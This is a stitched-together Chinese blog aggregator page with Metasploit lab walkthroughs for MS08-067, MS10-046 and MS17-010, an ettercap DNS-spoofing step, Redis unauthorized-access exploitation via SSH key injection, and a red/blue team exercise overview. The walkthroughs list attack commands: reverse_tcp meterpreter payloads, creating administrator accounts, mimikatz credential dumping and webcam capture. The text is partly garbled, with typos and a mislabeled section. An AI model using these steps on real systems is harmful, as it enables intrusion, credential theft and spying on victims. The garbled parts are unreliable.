漏洞

ms08-067漏洞

淺唱寂寞╮ 提交于 2020-01-07 23:37:28
# ms08-067漏洞攻击 实验过程 1.通过命令: ipconfig 、 ifconfig 确认攻击机和靶机在同一网段 2.通过ping命令确认靶机存活。 3.通过命令: msfconsole 启用msf。 4.攻击。 1.搜索漏洞,命令: search ms08-067 。 2.设置攻击机地址,命令: set lhost ip地址 3.设置攻击机端口,命令: set lport 端口号 4.设置靶机地址,命令: set rhost ip地址 5.加载攻击载荷,命令: set payload windows/meterpreter/reverse_tcp 。 6.进行攻击: exploit/run 5.获得靶机权限。 6.后渗透利用 1.查看权限 命令: gituid 2.进入shell 3.添加用户账号 命令: net 用户名 密码 /add 4.提权: net localgroup administrators 用户名 /add 5.远程登录 命令: rdesktop IP 6.查看无操作时间 命令: idletime 7.获取账户密码 命令: meterpreter> load mimikatz meterpreter> msv meterpreter> wdigest 8.查看网络摄像头列表 命令: wencam_list 9.拍照 命令: wencam_snap 10

ms10-046漏洞

六月ゝ 毕业季﹏ 提交于 2020-01-07 23:36:27
# ms10-046漏洞攻击 实验过程 1.通过命令: ipconfig 、 ifconfig 确认攻击机和靶机在同一网段 2.通过ping命令确认靶机存活。 3.通过命令: msfconsole 启用msf。 4.攻击。 1.搜索漏洞,命令: search ms10-046 。通过 use 使用漏洞。 2.设置主机监听地址,命令: set srvhost 本机ip地址 3.设置攻击机地址,命令: set lhost 本机ip 4.加载攻击载荷,命令: set payload windows/shell/reverse_tcp 。 5.进行攻击: exploit/run 5.配合使用ettercap进行dns欺骗。在文件最后添加 *.com A 本机ip 。 #cd /etc/ettercap #ls #vim etter.dns 6.开启ettercap劫持整个网段,命令: ettercap -T -q -i eth0 -P dns_spoof //// 7.劫持成功 漏洞描述: Microsoft Windows快捷方式LNK文件自动执行代码漏洞 Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所制定的目标具有相同效果。Windows没有正确的处理LNK文件

ms10-046漏洞

穿精又带淫゛_ 提交于 2020-01-07 23:36:00
# ms10-046漏洞攻击 实验过程 1.通过命令: ipconfig 、 ifconfig 确认攻击机和靶机在同一网段 2.通过ping命令确认靶机存活。 3.通过命令: msfconsole 启用msf。 4.攻击。 1.搜索漏洞,命令: search ms17-010 。通过 use 使用漏洞。 2.设置主机监听地址,命令: set rhost 靶机ip地址 3.进行攻击: exploit/run 5.获得靶机权限。 6.进行后渗透利用。 来源: https://www.cnblogs.com/Mrwuhuai/p/12164294.html

Redis未授权访问漏洞利用

不问归期 提交于 2020-01-07 22:40:47
0x00 测试环境 漏洞靶场:https://github.com/Medicean/VulApps/tree/master/r/redis/1 连接工具:https://redis.io/download 0x01 测试是否存在未授权访问漏洞 使用redis-cli尝试连接目标6379端口 #./redis-cli -h 192.168.233.131 -p 6379 //6379为默认端口,这里映射为32773,如果存在弱口令,可以通过参数-a [password]连接 此时可以看到已连接成功 0x02 多姿势漏洞利用 姿势1:写入公钥,通过私钥免密连接 1、在本地/root/.ssh目录下生成rsa密钥对 //id_rsa私钥,连接时用;id_rsa.pub公钥,上传内容至目标服务器 2、通过redis命令,将公钥写入到目标服务器 > config set dir /root/.ssh/ //指定存放路径 > config set dbfilename "authorized_keys" //指定上传的文件名 > set authorized_keys "公钥内容" //将公钥写入到文件中,可略过这条命令 > save //保存 3、使用ssh命令连接目标 # ssh root@192.168.233.131 -p 32774 -i ~/.ssh/id_rsa //-i

[转帖]如何开展护网行动

落花浮王杯 提交于 2020-01-07 20:49:49
如何开展护网行动 https://blog.csdn.net/sunxingstar/article/details/100036145 原创番茄庄园 发布于2019-08-23 13:54:31 阅读数 1211 收藏 展开 一、攻击队(蓝队)分类 军火商级:掌握0day漏洞、具备编写工具的能力。甚至有vpn的漏洞。攻击特点:直接攻击,如导弹、大炮一般,攻击猛烈,效果极强。 间谍级:长期APT钓鲸攻击,打入红队内部,通过木马控制重要用户终端,从而控制目标服务器。与系统管理员同工同息,极难被发现。 摊贩级:使用攻击工具,利用已有漏洞进行攻击,打击效果一般。 二、攻防队伍对比 600人组成的蓝方,红方需12万人参与防御。 得分标准: 蓝队:获取权限、穿透网络隔离、发现被控线索。 红队:发现木马、钓鱼邮件、溯源、应急处置。 三、红方攻略 收敛攻击面 漏洞补丁修补 建立纵深防御体系 安全设备冗余、多重已构 部署高交互蜜罐 回溯分析 四、重点防御 APT攻击 零日漏洞 违规外联 五、体现的问题 弱密码,密码复用。 VPN,邮箱系统0day漏洞。 域控、堡垒机、云平台、杀毒后台。 主机普遍零防御。 非法外联。 第三方接入。 供应链安全。 手机app安全。 六、防御措施 DMZ区防护:白名单防0day。 隔离 集权类设备:关键人识别APT攻击。 威胁情报共享、集体防御。 非法外联监控。 ———

CSRF漏洞

寵の児 提交于 2020-01-07 08:18:42
CSRF漏洞也叫夸站脚本伪造 XSS和CSRF的区别 从信任的角度来分析的话 XSS:是利用用户对站点的信任 CSRF:利用站点对客户端的信任 - 默认情况下站点是对客户端不信任的站点只会对已经身份验证过的客户端有一定的信任 利用 结合社工在身份认证会话过程中实现供给 修改账号密码、个人信息(email、收货地址) 发送伪造的业务请求(网银、购物、投票) 关注他人社交账号、推送博文 在用户非自愿、不知情的情况下提交请求 下面这样黑客就叫你的用户密码给盗取了 还有好多不如骗访问量和投票量还有广告还有产品推广 比如我们发送一个链接点击这个链接就会给我投票等等等 业务逻辑漏洞 服务器对关键操作缺少确认机制 提交密码修改没有确认机制,还有二次认证,确认机制就是列我们每次登陆一个帐号密码之后都会出现一个验证码这个就是确认机制 自动扫描程序无法发现此漏洞 无法检测的是否是恶意的修改密码,自动扫面程序是检测不出来的应为都是正常提交数据 漏洞利用条件 被害用户已经完成身份认证 新请求的提交不需要重新身份认证或确认机制 攻击者必须了解 Web APP 请求的参数构造 诱使用户触发攻击的指令(社工) 实验开始 下面这个带有CSRF漏洞的服务器 下面输入密码直接就可以确认修改没有如何认证机制 用Burp截断下来 在kali开一个服务器里做一个简单的页面 http://192.168.43.245

PHP反序列化漏洞#XCTF题 : unserialize3#绕过wakeup()函数

送分小仙女□ 提交于 2020-01-06 22:18:15
1.代码与结果 代码如下: <?php class xctf{ public $flag='111'; public function __wakeup(){ exit('bad requests'); } } $content = new xctf(); echo serialize($content); ?> 结果如下: O:4:"xctf":1:{s:4:"flag";s:3:"111";} 实验截图: 2.相关姿势点 2.1 PHP 常用命令行 2.11 Linux命令行运行指定php文件 php -f test.php 2.12 直接运行php代码 php -r "phpinfo();" 2.13 交互模式运行PHP php -a 2.14 PHP脚本作为shell脚本运行 没有权限则切换到root用户 sudo su echo '#!/usr/bin/php\n<?php var_dump($argv); ?>' > phpscript 注意,我们在该PHP脚本的第一行使用#!/usr/bin/php,就像在shell脚本中那样(/bin/bash)。 第一行的#!/usr/bin/php告诉Linux命令行用 PHP 解释器来解析该脚本文件。 确定phpscript 有可执行权限 chmod u+x phpscript ./phpscript -h --foo

熔断、幽灵分析以及模拟攻击、防范

这一生的挚爱 提交于 2020-01-06 20:29:10
熔断、幽灵分析以及模拟攻击、防范 背景 主要技术分析 当代cpu的存取器体系结构 乱序执行 分支预测 边信道攻击 熔断、幽灵攻击分析 熔断 幽灵 补丁防范 补丁带来的影响 攻击演示 源码展示 背景 当代cpu为了提高性能,而使用了了两项看似毫无纰漏的技术:乱序执行和分支预测。拥有这两项技术,cpu就可以不再局限于只是按顺序执行操作、也不在局限于等待条件判断完成后再执行语句的主题语句,这样cpu就可以超前执行那些相关性不强的代码或者先将语句中变量加载到内存、cache,充分的利用cpu中的空闲单元,极大的提高cpu的效率。 对于乱序执行,初看起来好似没有纰漏,但是对于分支预测,问题就出来了:如果分支预测失败,怎么办?Intel等cpu生产商也对这种情况做了除理,如果分支预测失败,那么cpu就会回滚到分支预测前的状态,还原本应有的寄存器等,这样程序就可以从分支判断再次执行。 可现实是,这两项技术都在未判断是否有权限访问数据的时候就,对将数据加载到了cache。如果分支预测失败,虽然cpu回滚了,但是我的cache仍然没有回滚,这样就导致了信息的泄露。 主要技术分析 当代cpu的存储器体系结构: 根据课程我们知道,cpu在访问内存时,会先将内存中的数据加载到cache中,再从cache中访问。cpu在访问cache时的速度要远远快于访问主存中的数据

EternalBlue永恒之蓝漏洞复现

房东的猫 提交于 2020-01-06 17:51:38
EternalBlue漏洞复现 1. 实训目的 永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。学习漏洞原理掌握攻击方法。 2. 实训原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。 注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无由于永恒之蓝利用工具会扫描开放445文件共享端口的Windows机器,所以如果用户开启445端口并且系统未打MS17-010补丁就会在无感状态下被不法分子向系统植入恶意代码 3. 实训环境 Kali系统 版本:2.0 IP:192.168.0.145 Win7系统 IP:192.168.0.130 开放端口:445 MSF框架版本:4.14.17版本以上 安装更新metasploit

Threat Risk Modeling Learning

百般思念 提交于 2020-01-06 03:12:28
相关学习资料 http://msdn.microsoft.com/en-us/library/aa302419(d=printer).aspx http://msdn.microsoft.com/library/ms994921.aspx http://sourceforge.net/projects/coras/ http://sourceforge.net/projects/easy-tra/ http://sourceforge.net/projects/ratiso17799/ https://www.owasp.org/index.php/Threat_Risk_Modeling http://msdn.microsoft.com/library/ms954176.aspx http://msdn.microsoft.com/library/ms978516.aspx http://outsourcing-center.com/category/manage-relationship/service-level-agreement-sla http://www.service-level-agreement.net/ http://www.whatis.com.cn/word_5214.htm http://www.octotrike.org/ http://www